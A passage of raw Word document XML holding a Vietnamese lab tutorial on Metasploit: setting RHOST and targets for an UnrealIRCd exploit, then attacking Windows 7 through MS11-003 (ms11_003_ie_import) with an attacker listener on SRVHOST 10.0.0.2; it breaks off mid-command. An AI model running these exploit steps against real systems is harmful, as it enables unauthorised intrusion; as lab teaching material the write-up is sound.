          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">set RHOST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(địa chỉ IP ở đây là địa chỉ mục tiêu)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>: set RHOST 172.16.100.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4B7A19" w14:textId="77777777" w:rsidR="00DF4360" w:rsidRDefault="00DF4360" w:rsidP="006865EE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ABEF8EC" w14:textId="48AE821A" w:rsidR="00F366C5" w:rsidRDefault="00F366C5" w:rsidP="006865EE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F366C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69C20439" wp14:editId="7058062B">
            <wp:extent cx="5727700" cy="327025"/>
            <wp:effectExtent l="0" t="0" r="1270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7025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF181EC" w14:textId="77777777" w:rsidR="00F366C5" w:rsidRDefault="00F366C5" w:rsidP="006865EE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D5F4C7E" w14:textId="1205B2C7" w:rsidR="00F366C5" w:rsidRDefault="00F366C5"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ể kiểm tra lại ta tiếp tục sử dụng lệnh: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A6546D" w14:textId="77777777" w:rsidR="00DC131F" w:rsidRDefault="00DC131F" w:rsidP="006865EE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FA837A2" w14:textId="492572DF" w:rsidR="00F366C5" w:rsidRDefault="00DC131F" w:rsidP="006865EE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC131F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CB4BE36" wp14:editId="6942FB0F">
            <wp:extent cx="5727700" cy="216154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161540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D01BB9B" w14:textId="77777777"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p>
    <w:p w14:paraId="1686F344" w14:textId="540AF21F"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Ta đã thiết lập thành công địa chỉ RHOST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F76295" w14:textId="77777777"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p>
    <w:p w14:paraId="278DC75F" w14:textId="2BFEB97C"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ước 3: Chọn loại mục tiêu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C5E27C" w14:textId="50D7B5FC" w:rsidR="00DC131F" w:rsidRDefault="00B97A38"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Đối với exploit unr</w:t>
      </w:r>
      <w:r w:rsidR="00DC131F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>eal dúng ở ví dụ n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ày thì chỉ có một tuỳ chọn mục</w:t>
      </w:r>
      <w:r w:rsidR="00DC131F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> tiêu là Automatic Target thôi, tuy nhiên với một số exploit khác sẽ có rât nhiều tuỳ chọn và cũng như với tham số ta có thể xem và thiết lập giá trị cho nó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F965126" w14:textId="77777777" w:rsidR="00DC131F" w:rsidRDefault="00DC131F" w:rsidP="006865EE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="748DC3AF" w14:textId="104DBC0F" w:rsidR="00DC131F" w:rsidRDefault="00DC131F"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Lệnh để hiện thị ra tất cả các loại mục tiêu được chọn và ID của từng loại: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>show targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6D7589" w14:textId="77777777" w:rsidR="00B97A38" w:rsidRDefault="00B97A38" w:rsidP="006865EE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48431124" w14:textId="74EDD810" w:rsidR="00B97A38" w:rsidRDefault="00380F5E" w:rsidP="006865EE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00380F5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6386E428" wp14:editId="6A14786C">
            <wp:extent cx="5727700" cy="1165225"/>
            <wp:effectExtent l="0" t="0" r="1270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165225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5CB468" w14:textId="77777777"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p>
    <w:p w14:paraId="3581C636" w14:textId="387344FF" w:rsidR="00380F5E" w:rsidRDefault="00380F5E"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ể thiết lập một loại mục tiêu cho exploit ta dùng lệnh: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>set target &lt;ID&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733AF91A" w14:textId="392AC06E"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i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="382514FA" w14:textId="71976077"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Bắt đầu khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575C9C08" w14:textId="77777777" w:rsidR="00380F5E" w:rsidRDefault="00380F5E" w:rsidP="006865EE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27D437BC" w14:textId="0FBA4620" w:rsidR="00380F5E" w:rsidRDefault="00380F5E" w:rsidP="006865EE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>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Đơn giản với lệnh exploit là ta đã khai thác được lỗ hổng của mục tiêu: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A42D75" w14:textId="77777777" w:rsidR="00DC1AC6" w:rsidRDefault="00DC1AC6" w:rsidP="006865EE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25635A9F" w14:textId="63C3BE8C" w:rsidR="00BF1B5C" w:rsidRDefault="00A44C21" w:rsidP="00BF1B5C">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w:t>
      </w:r>
      <w:r w:rsidR="00BF1B5C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>4. Một số lổng hổng trên windowns 7.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A966CF3" w14:textId="350BD5EA" w:rsidR="000D4E57" w:rsidRPr="000D4E57" w:rsidRDefault="000D4E57" w:rsidP="000D4E57">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">IV.4.1. </w:t>
      </w:r>
      <w:r w:rsidRPr="000D4E57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Lỗi MS11_003</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CB48FC" w14:textId="77777777" w:rsidR="000D4E57" w:rsidRPr="000D4E57" w:rsidRDefault="000D4E57" w:rsidP="000D4E57">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D4E57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Thực hiện tấn công Windows 7. Ta đổi địa chỉ IP 2 máy attacker và victim về cùng một dải mạng. Ta gõ lệnh sau # </w:t>
      </w:r>
      <w:r w:rsidRPr="000D4E57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>vi /etc/network/interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="000D4E57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> để sửa lại địa chỉ IP trên máy attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BBBA98" w14:textId="1DF24B43" w:rsidR="000D4E57" w:rsidRDefault="000D4E57" w:rsidP="000D4E57">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D4E57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="733E0E59" w14:textId="7CDCA3F1" w:rsidR="000D4E57" w:rsidRPr="000D4E57" w:rsidRDefault="000D4E57" w:rsidP="000D4E57">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D4E57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Sau khi chỉnh sửa xong địa chỉ IP ta lưu lại và khởi động lại card mạng bằng lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="000D4E57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t># /etc</w:t>
      </w:r>
      <w:r w:rsidR="00A90697">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="000D4E57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>init.d/networking restart</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000D4E57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tiếp tục ta gõ lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="000D4E57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t># msfconsole</w:t>
      </w:r>
      <w:r w:rsidRPr="000D4E57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> để khai thác lỗ hổng thông qua công cụ Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29920836" w14:textId="039C3FCA" w:rsidR="000D4E57" w:rsidRDefault="000D4E57" w:rsidP="00BF1B5C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="378A6071" w14:textId="37800665" w:rsidR="00A90697" w:rsidRDefault="00A90697" w:rsidP="00A9069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 xml:space="preserve">Ta tiếp tục gõ lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00A90697">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>msf5 &gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A90697">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>search ms11_003</w:t>
      </w:r>
      <w:r w:rsidRPr="00A90697">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> để tìm kiếm lỗ hổng MS11_003 trên CSDL của Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45822A75" w14:textId="77777777" w:rsidR="00A90697" w:rsidRDefault="00A90697" w:rsidP="00BF1B5C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="205E6CDF" w14:textId="77777777" w:rsidR="00A90697" w:rsidRDefault="00A90697" w:rsidP="00A90697">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A90697">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Ta gõ tiếp dòng lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00A90697">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>use exploit/windows/browser/ms11_003_ie_import</w:t>
      </w:r>
      <w:r w:rsidRPr="00A90697">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, tiếp theo ta thiết lập IP lắng nghe khi có kết nối trả về máy attacker set SRVHOST 10.0.0.2 Sau đó gõ tiếp lệnh set </w:t>
      </w:r>
      <w:r w:rsidRPr="00A90697">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
